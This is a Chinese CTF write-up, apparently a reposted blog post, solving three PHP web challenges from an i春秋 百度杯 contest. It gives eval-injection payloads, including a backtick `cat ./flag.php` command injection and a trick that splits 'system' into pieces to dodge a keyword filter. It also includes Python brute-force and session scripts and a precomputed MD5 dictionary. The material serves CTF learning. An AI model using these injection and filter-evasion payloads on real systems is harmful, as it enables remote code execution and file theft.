i春秋 百度杯”CTF比賽(二月場) Misc&&web題解 By Assassin
阿新 • • 發佈:2018-12-31
爆破-1
開啟題目我們直接就看到原始碼,加上註釋如下
<?php
include "flag.php"; //包含flag.php這個檔案
$a = @$_REQUEST['hello']; //$a這個變數請求變數hello的值
if(!preg_match('/^\w*$/',$a )){ //正則表示式,匹配字串,\w表示字元+數字+下劃線,*代表有若干個\w字元組成。
die('ERROR');//不匹配則輸出ERROR
}
eval("var_dump($$a);"); //如果匹配輸出\$\$a的值
show_source(__FILE__ 而且通過題目連結可以知道hello變數一定是6位的,一開始真以為是爆破了,但是一想肯定很大,不可能。而且我們發現 $$a 這個東西很詭異。其實就是php中變數可以當作另一個變數的變數名。例如
<?php
$a='b';
$b="hello world!";
eval("var_dump($$a);");
?>上面程式碼會輸出hello world!
PHP一個比較有意思的變數!$GLOBALS:一個包含了全部變數的全域性組合陣列。變數的名字就是陣列的鍵。
於是我們在url上構造/?hello=GLOBALS,結果就直接出來了!根本不是爆破好吧!
爆破-2
這時候程式碼為
<?php
include "flag.php";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");
show_source(__FILE__);我們可以看到第一種方法不好用了,所以另闢他徑!我們注意到flag.php,會不會答案就在這個裡面呢?而且”var_dump($a);”這個字串是不是可以注入呢?明顯是可以的!
構造payload如下
?hello=);echo%20`cat%20./flag.php`;//然後這裡面就必須講一下一些小技巧!第一單引號,雙引號,反引號在bash中的作用!
(PS:反引號位 (`) 位於鍵盤的Tab鍵的上方、1鍵的左方。注意與單引號(‘)位於Enter鍵的左方的區別。)
反括號`在Linux中起著命令替換的作用。命令替換是指shell能夠將一個命令的標準輸出插在一個命令列中任何位置。如下:
[[email protected] sh]# echo The date is `date`
The date is 2011年 03月 14日 星期一 21:15:43 CST
單引號、雙引號用於使用者把帶有空格的字串賦值給變數事的分界符。如果沒有單引號或雙引號,shell會把空格後的字串解釋為命令。
單引號和雙引號的區別。單引號告訴shell忽略所有特殊字元,而雙引號忽略大多數,但不包括$、\、`。
栗子:
[[email protected] tmp]# echo ‘the date is `date`’
the date is `date`
[[email protected] tmp]# echo “the date is `date`”
the date is Fri Oct 9 00:11:56 CST 2015
是不是發現了什麼!eval( “var_dump($a);”);正式雙引號!!!我們就可以用`了!
然後用cat讀取輸出即可!
這裡還收集了其他的姿勢!payload如下:
?hello=$a);print_r(file("./flag.php")); //hello=$a);$a="sys";$b="tem";$c=$a.$b;echo%20$c;$c("cat%20./flag.php");
// 這裡發現 i春秋 在http請求中攔截了 system 函式等關鍵字 ,
因此可以通過 php 的字串連線成為函式名 , 然後進行呼叫
這裡其實是把 system 函式名作為字串分開 , 這樣在 http 請求頭中不會出現 "system(xxx)" 這樣的關鍵字爆破-3
首先我們看到題目的指令碼
<?php
error_reporting(0);
session_start();
require('./flag.php');
if(!isset($_SESSION['nums'])){
$_SESSION['nums'] = 0;
$_SESSION['time'] = time();
$_SESSION['whoami'] = 'ea';
}
if($_SESSION['time']+120<time()){
session_destroy();
}
$value = $_REQUEST['value'];
$str_rand = range('a', 'z');
$str_rands = $str_rand[mt_rand(0,25)].$str_rand[mt_rand(0,25)];
if($_SESSION['whoami']==($value[0].$value[1]) && substr(md5($value),5,4)==0){
$_SESSION['nums']++;
$_SESSION['whoami'] = $str_rands;
echo $str_rands;
}
if($_SESSION['nums']>=10){
echo $flag;
}
show_source(__FILE__);
?>
簡易的分析可以知道生成幾個SESSION變數,其中time是計時的,nums是計數的。當nums沒有設定的時候會給一個初始化變數。需要在120s內完成遮掩一件事。指令碼用隨機數跑出兩位的字串,你需要輸入一個串前兩位和隨機生成的串相等,而且輸入串的MD5值的第5-9為必須為“0000”。這個時候全部匹配的話nums++。在匹配後whoami被更新,但是它在頁面中輸出了,我們可以知道!當nums在120s內完成10次以上就可以得到flag。
那麼問題來了,真的是爆破的話我們需要跑出一個字典,分別記錄26*26種開頭對應滿足條件的串.
爆破指令碼
# -*- coding:utf-8 -*-
#這個指令碼用random跑的隨機串,生成的速度慢一些
import random
import hashlib
str1=["a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"]
def findgood(str2):
for i in range(1000000):
password=str2
password+=random.choice(str1)
password+=random.choice(str1)
password+=random.choice(str1)
password+=random.choice(str1)
password+=random.choice(str1)
password+=random.choice(str1)
if(hashlib.md5(password).hexdigest()[5:9]=="0000"):
return password
return "Not find!"
result=open('mima.txt','a+')
for i in str1:
for j in str1:
password=findgood(i+j)
print i+j+" "+password
result.write(i+j+":"+password)
result.close()
然後我們就要用指令碼連結目標網站了,但是有一個問題,用python實現的時候要用requests中的requests.Session(),而不可以直接urlopen,因為每一次這樣開啟相當於新的連結進入,session是不會儲存的!注意!
下面是實驗成功程式碼(注意我這麼寫主要根據的字典的格式)
import requests
file = 'C:\\xxxx\\mima.txt'
mima= open(file,'r+')
content=mima.readlines()
session = requests.Session()
value = "ea"
url = "http://dc600d84281e40cba349347d92660cd31c3a29f654104b35.ctf.game//?value="
for i in range(12):
for j in content:
if j[0:2]==value:
md5value=j[3:11]
response=session.get(url+md5value)
temp=response.text
value=temp[0:2]
if i >10:
print temp
順手分享一下現成的字典
aa aawkntax
ab abbjfesk
ac achfwxqv
ad adjsvcmd
ae aegryksl
af afbqavho
ag agmesuot
ah ahzfkgkb
ai aivobshx
aj ajgenzvw
ak akuwdoez
al aloapjto
am amauirgd
an anndsmce
ao aoeiktji
ap apzzqskh
aq aqotslgf
ar arufddla
as asalapxu
at atinpfjx
au auqbksqt
av avocmtkk
aw awnadxzu
ax axdrwaja
ay aygsykas
az azqxwdyo
ba banipmif
bb bbdpirxv
bc bclbfjqe
bd bduhwyii
be bekwgcxd
bf bfhoiwey
bg bgbfpmws
bh bhmojqhg
bi biuhupvb
bj bjowwwiv
bk bkgmsmgl
bl blfnqewn
bm bmksxqzl
bn bnqnzamc
bo boukkgsz
bp bpgbymik
bq bqqaqkkj
br brzfedob
bs bsizxozv
bt btlllqpn
bu buxwetkv
bv bvvhpxrz
bw bwiudbba
bx bxxdreia
by bydzldxy
bz bzmewmzd
ca capwierq
cb cbqcicxf
cc ccicavlb
cd cdmptukg
ce ceibrxnl
cf cfdholgi
cg cgaeqxnx
ch choezwow
ci ciybbwxt
cj cjfzcnmp
ck ckczxjxy
cl clwdoszz
cm cmazzprr
cn cnfzzmda
co coqumsda
cp cpfftmih
cq cqpljdzt
cr crwnqcji
cs csochcjj
ct ctijkwec
cu cusrvfnl
cv cvmhepir
cw cwnujazq
cx cxhvrzos
cy cynudbij
cz czfmojyb
da dajznvxq
db dbptbbpz
dc dcoemeee
dd ddxthrii
de dehttqkp
df dfzojnuo
dg dgetxjlb
dh dhkezlfg
di didgcjca
dj djwixmxk
dk dkshvkgi
dl dldsrsam
dm dmhzbsvr
dn dnncidlm
do dovxdvhr
dp dpiwclzf
dq dqhfiudt
dr drynyvae
ds dsubyjen
dt dtykrqpd
du dupepwhb
dv dvkzpfpt
dw dwlmhlfk
dx dxnuipsu
dy dywcgyfk
dz dzxgyjyw
ea earteyes
eb ebmvhnym
ec echblymf
ed edtncefp
ee eecjcbpd
ef efkdpajd
eg egcdpzmb
eh ehbvdxlj
ei eirtsjxp
ej ejbhxrsy
ek ekrojqvr
el eloibbxl
em emveuhil
en enwebskq
eo eouofwbe
ep epumonps
eq eqkeeoac
er erppzuqw
es esxhodxw
et etgndtdf
eu eujtohoj
ev evdurfgo
ew ewouccrh
ex exqsfqns
ey eydkhomk
ez ezhlchmw
fa fafzimir
fb fbylznev
fc fcvpemut
fd fdziqfzw
fe fecirbtk
ff ffdadnlv
fg fgyyiyry
fh fhckktdl
fi finpccjm
fj fjvtkeco
fk fkcxskan
fl flovrkve
fm fmbealqu
fn fnhbcqen
fo foefwksl
fp fpwqmkfg
fq fqgyqchb
fr frpcqlul
fs fsjridbw
ft ftrgiqke
fu fudsbmvy
fv fvzuwwke
fw fwgpmffn
fx fxyebdhh
fy fyqyogar
fz fzdolwlp
ga gapkitff
gb gbofykyh
gc gcgchndw
gd gdqaymoj
ge geffsndj
gf gffxdwom
gg ggzayqlx
gh ghqkyhvr
gi gilbuahw
gj gjysrbtq
gk gkyxskxm
gl glzllqpm
gm gmoraxsl
gn gnnrimld
go gobsfcep
gp gpcosvtz
gq gqpnojuk
gr grevzjlk
gs gsqgtgjc
gt gtxccyau
gu guvdfngf
gv gvpxkoib
gw gwyjlrfn
gx gxuwnogn
gy gykzfcef
gz gzcmjnga
ha hazucwrp
hb hbdllvwf
hc hcbhlaja
hd hdwfavfp
he heevhdvl
hf hfuwbsmo
hg hgiagijc
hh hhpsgdfy
hi hifckmer
hj hjrqnvvj
hk hkdbtgcn
hl hlcxhfbh
hm hmlydtoa
hn hnysavbn
ho hoxrihot
hp hpjskcfg
hq hqpaxnwx
hr hrdaouuo
hs hsinwfts
ht htgtnusc
hu humdzfne
hv hvlzqqkw
hw hwcemcht
hx hxahhsbm
hy hymattiq
hz hzwoutwd
ia iaqnjwwb
ib ibejrmtz
ic icwqyfpv
id idqqcbdy
ie iebkunoj
if ifpcdnuj
ig igkodbdq
ih ihsidrdd
ii iienhwsm
ij ijxmalsq
ik ikuqvzrw
il ilqfzswp
im imkgswsg
in inhtdpdq
io ionbekgu
ip ipkkpoed
iq iqemqrba
ir irthfvfg
is isbxzvth
it ithjdgmn
iu iuqrosnx
iv ivtmpriq
iw iwwpldec
ix ixwsands
iy iyecfqyb
iz izmytcgr
ja jamssgek
jb jbexxzuq
jc jcaxisnx
jd jdrddgre
je jetagess
jf jfassqne
jg jgnhsvga
jh jhzmrnwn
ji jicixxry
jj jjvmwybj
jk jkkggbhr
jl jlyfapce
jm jmgviuna
jn jnrtdrdp
jo jowpevpr
jp jpplswjf
jq jqbnewgg
jr jrodxodi
js jstsropv
jt jtxayowq
ju juxbkedf
jv jvwgzaqi
jw jwyzabpm
jx jxvkkjvd
jy jyerpukc
jz jzrftrdb
ka kaolkzyr
kb kbppacrs
kc kcvrigqr
kd kdyibdmr
ke ketymgvf
kf kfyldpwa
kg kgmiitgl
kh khhqwzqm
ki kijpvqut
kj kjrbvzlj
kk kkunucbq
kl klsklmnf
km kmamiypq
kn knqezidp
ko kohayxdz
kp kpncguqe
kq kqoufyfz
kr krefwkrd
ks kspoquhf
kt ktyimglg
ku kuwylyjz
kv kveskxbf
kw kwqfwkew
kx kxjlkfbv
ky kyvftzgl
kz kzhrbtjf
la laaqject
lb lbmceyxr
lc lcudztpt
ld ldlgscwm
le letnuruj
lf lfypuomh
lg lgvimebg
lh lhavdbtq
li lipwioaa
lj ljhastxm
lk lkuosoym
ll llyaisuj
lm lmppefed
ln lnddbfnf
lo loanhizz
lp lpomcqqu
lq lqwkndjt
lr lrcaoijm
ls lsaongos
lt lttoyhty
lu lufmipms
lv lvxrbrik
lw lwuzrwav
lx lxyvoakg
ly lyyvfpfh
lz lzzwhyhc
ma mapbgxtu
mb mblpbqwf
mc mctzguem
md mdugqjyv
me meomqmlm
mf mffdqegx
mg mgzkxhpc
mh mhwverea
mi miaoxyat
mj mjzplpjp
mk mkdcnarr
ml mlktrhfw
mm mmdbugun
mn mnxvryar
mo motkrtqe
mp mpeqbgqp
mq mqojffio
mr mrjedgis
ms msdscqsu
mt mtmkfwvy
mu muaqkuuo
mv mvxlovrh
mw mwcahvpu
mx mxpflcog
my myphnova
mz mzsealnm
na nargvypa
nb nbxbdecv
nc ncvhxdkq
nd ndmohqbz
ne nebbwahz
nf nfjvmrow
ng nghmcblx
nh nhoqsheh
ni nigvthee
nj njqfyweb
nk nkekuwtg
nl nlixyeqj
nm nmurmfbj
nn nnzhrmzr
no nogodsmu
np npmvsbch
nq nqhlwuck
nr nralxfhx
ns nssklpkz
nt ntdbnlfd
nu nucvmzsv
nv nvefivss
nw nwnjofhg
nx nxlywbsz
ny nykjlbvk
nz nzlbwyls
oa oapyfcop
ob obyenzsp
oc ocrfphbz
od odwqtbiy
oe oejixcka
of ofdpzuyw
og ogtefvwg
oh ohtbanyu
oi oiyjeewr
oj ojsnhpcp
ok okcrycvc
ol olqlbtvy
om omgdalhy
on onrylers
oo ooxfszqz
op oppkrhrz
oq oqotlrqe
or orfsncma
os oswywryz
ot otuqgble
ou outhegom
ov ovwyiiuz
ow ownbtssi
ox oxlxmjpz
oy oydtvzxf
oz ozjfaoot
pa paghhmyr
pb pbcxkbft
pc pcusbrqn
pd pdujkuod
pe pexhyaoe
pf pfwtualw
pg pgrydiaj
ph phirssel
pi pidgeqcy
pj pjtslsmp
pk pkrxlruu
pl plstqrdx
pm pmyaeoht
pn pnxefudm
po poufywac
pp ppnddmmx
pq pqwmrjzi
pr priyqpvc
ps psqxwikf
pt ptkxeuti
pu pumttqtv
pv pvpvijka
pw pwoximiy
px pxysddzb
py pyuflsgy
pz pzrvdden
qa qardmuda
qb qbaykdeh
qc qchtuszf
qd qdiesoww
qe qetggivt
qf qftmovev
qg qguxhnau
qh qhhhrleg
qi qipwrjbk
qj qjgdjwfa
qk qkquaneh
ql qldcrhfj
qm qmdrvhxb
qn qnukydnn
qo qolhjxnq
qp qpfamghb
qq qqwjvaia
qr qrqcbexl
qs qstvhvpg
qt qtwjblze
qu quaghwkh
qv qvukdndx
qw qwnnhyvq
qx qxbspqou
qy qyrxwgpz
qz qzvztbzj
ra raxzwudb
rb rbzculyy
rc rcvjvnlz
rd rdaddkjz
re rewpjcuj
rf rfhmvhby
rg rgogudoj
rh rhvyngvk
ri rigsxwxk
rj rjveogko
rk rknxmiut
rl rlciiiti
rm rmacddes
rn rnowbelw
ro rotypitn
rp rphjazwp
rq rqxbpfzy
rr rreyzbdo
rs rsdbeglj
rt rtnaafup
ru ruiucsjh
rv rvebhrlb
rw rwbvzoyr
rx rxcoclrn
ry ryjycoid
rz rzdlkdny
sa sapvcqgu
sb sbpevonl
sc scwfahoc
sd sdqncuni
se seatltpn
sf sfbbobnb
sg sgdhtbhz
sh shwypaus
si sifyqanq
sj sjhbkfmg
sk skpyetbl
sl slmimuja
sm smwabfhu
sn snimgltn
so soyvnpbh
sp spaknzmp
sq sqdxfbti
sr srpeakmn
ss sstojbhn
st sthctgnt
su sunqnwyy
sv svccwuzg
sw swktqnkz
sx sxpwzabq
sy symhvdjd
sz szprkzlu
ta tasrkbdl
tb tbteedzn
tc tcvlymhk
td tdewtzna
te tebyeavm
tf tfzrihve
tg tggfizmb
th thaaeqes
ti tiyemisd
tj tjdxyhst
tk tkvblaiq
tl tlgwwckf
tm tmsgpyul
tn tnvhkmki
to toduoros
tp tpcbfush
tq tqfklchd
tr traqgxxc
ts tsswmmvt
tt ttlhkppl
tu tupvlooo
tv tvmbrafm
tw twvtnksd
tx txtzusts
ty tyeetouj
tz tzaazxss
ua uavkpkua
ub ubgfgfbb
uc ucbdpppo
ud udbxgsrg
ue uegjkzyv
uf uffuroty
ug ugcsdqgg
uh uhfbvfyg
ui uidsehfw
uj ujqeivnz
uk ukfriivy
ul ulsmsmlu
um umhgpvud
un unylewuv
uo uofktkdz
up upelfxpc
uq uqqpjkse
ur urcjjagb
us usrtzxcg
ut uttsyaet
uu uuqipdmy
uv uvugrhay
uw uwqfxbjb
ux uxjtrjot
uy uysffvhq
uz uzmoviui
va vaszafbs
vb vbxlzgep
vc vcpcovqd
vd vdduswma
ve veqvxkav
vf vfwhloev
vg vggyqzfx
vh vhsrrtiz
vi vimrdxnx
vj vjdzntru
vk vkjlvpbf
vl vlcdokwh
vm vmeifrid
vn vnunawil
vo voqmppuz
vp vpyeuina
vq vqorxprp
vr vruwltfi
vs vsdonmbw
vt vtaqaxqp
vu vufsyvjo
vv vvsdqyqh
vw vwggcxyc
vx vxwrwhbp
vy vyasjmnd
vz vzmecspa
wa waipknsf
wb wbyqaoxh
wc wcslelve
wd wdnkeoje
we wexeijgw
wf wfhliyck
wg wglfhhcr
wh whcbzlxe
wi wibrruar
wj wjjanicb
wk wkvmtnji
wl wlyhswqe
wm wmunahyc
wn wnxfiojy
wo wodvqblo
wp wprchvdq
wq wqzmvbmb
wr wrpofgxg
ws wsxhpeiq
wt wtxbrtkf
wu wuszutup
wv wvxvbcaa
ww wwxuzjxs
wx wxhhbros
wy wyxrhhbd
wz wznjhghm
xa xadfqzuk
xb xbvwpcgg
xc xcgqarsg
xd xdsuihcd
xe xezdglsl
xf xfrmjtte
xg xgarigyg
xh xhuiboie
xi xijyxiza
xj xjvbewyn
xk xkksfwmr
xl xlosccki
xm xmuoxdqa
xn xnrfnllf
xo xocgfpdd
xp xpxvdljf
xq xqpvhykc
xr xrqfdcsi
xs xszsvkqe
xt xtqyrdxp
xu xujvhrbn
xv xvjxnuxm
xw xwqnmsba
xx xxrcwupf
xy xyorfdre
xz xzoprmrt
ya yazafejm
yb ybwogpyn
yc ycaxhdug
yd ydbvkzdf
ye yenfxdqh
yf yfwavfda
yg yglxlgrm
yh yheefgte
yi yimnoavm
yj yjzjyuyu
yk yktwpsco
yl yliegplu
ym ymdhxzxa
yn ynkshubj
yo yodngrmd
yp ypzrvvah
yq yqhahgxe
yr yrhqbevl
ys ysptddzj
yt ytyocojg
yu yuezmwxb
yv yvezdspd
yw ywgzruvg
yx yxyierlk
yy yypubgrf
yz yznkhkps
za zaecekxx
zb zbnzsrde
zc zcwfjxch
zd zdhlvslx
ze zetrbemj
zf zfflowil
zg zgjwwdca
zh zhpzzkkf
zi zipwlufp
zj zjgepord
zk zkuugoao
zl zlewpinh
zm zmvzbkgd
zn znmilqsa
zo zogbvcwe
zp zphhcmao
zq zqswnmmr
zr zrmmfnrh
zs zszxbedw
zt ztafdiqw
zu zuhzvehg
zv zvldsnqc
zw zwoqhuca
zx zxsijtny
zy zyxgjbez
zz zzkmajgj